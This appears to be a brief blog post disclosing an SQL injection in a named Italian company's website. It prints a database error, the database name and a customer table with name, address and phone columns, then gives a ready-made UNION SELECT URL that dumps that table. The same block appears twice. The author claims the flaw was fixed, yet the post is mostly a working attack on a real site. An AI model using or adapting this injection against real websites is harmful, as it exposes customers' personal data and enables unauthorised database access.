Since the injection have been fixed time ago ... I just publish some samples (nothing confidential)
Sample error
[TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY N1 ASC, ID_Head DESC' at line 1
/ita/web/index.asp, line 15
db: Sql39909_2
sample table -> clienti
columns -> cliente, indirizzo, data, telefono
sample injection
http://www.meridianaitalia.it/ita/web/index.asp?id_menu=3%20UNION%20Select%20*%20from%20Sql39909_2.clienti/*&menu=Newa
Sample error
[TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY N1 ASC, ID_Head DESC' at line 1
/ita/web/index.asp, line 15
db: Sql39909_2
sample table -> clienti
columns -> cliente, indirizzo, data, telefono
sample injection
http://www.meridianaitalia.it/ita/web/index.asp?id_menu=3%20UNION%20Select%20*%20from%20Sql39909_2.clienti/*&menu=Newa
Comments
Post a Comment